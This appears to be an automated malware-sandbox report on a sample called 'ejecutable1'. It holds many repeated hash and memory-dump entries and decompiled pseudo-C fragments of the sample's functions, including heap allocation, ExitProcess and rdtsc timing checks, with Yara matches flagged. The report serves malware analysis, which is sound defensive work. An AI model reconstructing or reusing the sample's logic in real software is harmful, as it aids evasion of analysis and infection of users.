                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 74%
                                                                    			E004088C0(intOrPtr* _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v24;
                                                                    				char _v284;
                                                                    				char _v804;
                                                                    				char _v840;
                                                                    				void* _t24;
                                                                    				void* _t31;
                                                                    				void* _t33;
                                                                    				void* _t34;
                                                                    				void* _t39;
                                                                    				void* _t48;
                                                                    				intOrPtr* _t50;
                                                                    				void* _t51;
                                                                    				void* _t52;
                                                                    				void* _t53;
                                                                    				void* _t54;
                                                                    
                                                                    				_t50 = _a4;
                                                                    				_t39 = 0; // executed
                                                                    				_t24 = E00406E20(_t50,  &_v24); // executed
                                                                    				_t52 = _t51 + 8;
                                                                    				if(_t24 != 0) {
                                                                    					_t40 =  &_v840;
                                                                    					E00407030( &_v24,  &_v840);
                                                                    					_t53 = _t52 + 8;
                                                                    					do {
                                                                    						_push(0x104);
                                                                    						_push( &_v284);
                                                                    						E0041A0E0(_t40);
                                                                    						_t40 =  &_v804;
                                                                    						E0041A750( &_v284,  &_v804);
                                                                    						_t54 = _t53 + 0x10;
                                                                    						_t48 = 0x4f;
                                                                    						while(1) {
                                                                    							_t31 = E00413DE0(_t40, E00413D80(_t50, _t48),  &_v284);
                                                                    							_t54 = _t54 + 0x10;
                                                                    							if(_t31 != 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t48 = _t48 + 1;
                                                                    							if(_t48 <= 0x62) {
                                                                    								continue;
                                                                    							} else {
                                                                    							}
                                                                    							goto L8;
                                                                    						}
                                                                    						_t9 = _t50 + 0x14; // 0xffffe1b5
                                                                    						_t40 =  *_t9;
                                                                    						 *(_t50 + 0x474) =  *(_t50 + 0x474) ^  *_t9;
                                                                    						_t39 = 1;
                                                                    						L8:
                                                                    						_t33 = E00407060( &_v24,  &_v840);
                                                                    						_t53 = _t54 + 8;
                                                                    					} while (_t33 != 0 && _t39 == 0);
                                                                    					_t34 = E004070E0(_t50,  &_v24); // executed
                                                                    					if(_t39 == 0) {
                                                                    						asm("rdtsc");
                                                                    						asm("rdtsc");
                                                                    						_v8 = _t34 - 0 + _t34;
                                                                    						 *((intOrPtr*)(_t50 + 0x55c)) =  *((intOrPtr*)(_t50 + 0x55c)) + 0xffffffba;
                                                                    					}
                                                                    					 *((intOrPtr*)(_t50 + 0x31)) =  *((intOrPtr*)(_t50 + 0x31)) + _t39;
                                                                    					_t20 = _t50 + 0x31; // 0x5608758b
                                                                    					 *((intOrPtr*)(_t50 + 0x32)) =  *((intOrPtr*)(_t50 + 0x32)) +  *_t20 + 1;
                                                                    					return 1;
                                                                    				} else {
                                                                    					return _t24;
                                                                    				}
                                                                    			}

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                    • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                                                    • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                    • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 55%
                                                                    			E00418912(void* __eflags, intOrPtr _a4, int _a8, char _a12, long _a16, long _a20) {
                                                                    				intOrPtr* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr* _t8;
                                                                    				intOrPtr* _t9;
                                                                    				void* _t11;
                                                                    
                                                                    				asm("in eax, 0x79");
                                                                    				asm("movsd");
                                                                    				_t9 = _t8;
                                                                    				asm("enter 0x9c8, 0xb7");
                                                                    				asm("int 0xdb");
                                                                    				if(__eflags <= 0) {
                                                                    					__ebp = __esp;
                                                                    					__esi = _a4 + 0xc7c;
                                                                    					ExitProcess(_a8);
                                                                    				}
                                                                    				asm("adc al, 0x9");
                                                                    				 *_t9 =  *_t9 + _t9;
                                                                    				_t3 =  &_a12; // 0x413526
                                                                    				_t11 = RtlAllocateHeap( *_t3, _a16, _a20); // executed
                                                                    				return _t11;
                                                                    			}

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418948
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateExitHeapProcess
                                                                    • String ID: &5A
                                                                    • API String ID: 1054155344-1617645808
                                                                    • Opcode ID: 37ecb02be97ba8e4d2bd12a149df672563161c6d4ff55112c63d3ffac8f8a17c
                                                                    • Instruction ID: 66285f2fc44875e5db4a20446be51802aaa9e2d4a9bfaeee72af0747e4fade6c
                                                                    • Opcode Fuzzy Hash: 37ecb02be97ba8e4d2bd12a149df672563161c6d4ff55112c63d3ffac8f8a17c
                                                                    • Instruction Fuzzy Hash: AEF09AB6600208BFD710EF58CC85ED737A8AF99750F15806AFC185B302C635EA01CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph
                                                                    control_flow_graph 8 4188a0-4188d1 call 4191d0 RtlAllocateHeap
                                                                    C-Code - Quality: 79%
                                                                    			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                    				intOrPtr* _t8;
                                                                    				void* _t10;
                                                                    				void* _t15;
                                                                    
                                                                    				_t8 = E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                    				asm("adc al, 0x9");
                                                                    				 *_t8 =  *_t8 + _t8;
                                                                    				_t6 =  &_a8; // 0x413526
                                                                    				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                                    				return _t10;
                                                                    			}

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID: &5A
                                                                    • API String ID: 1279760036-1617645808
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
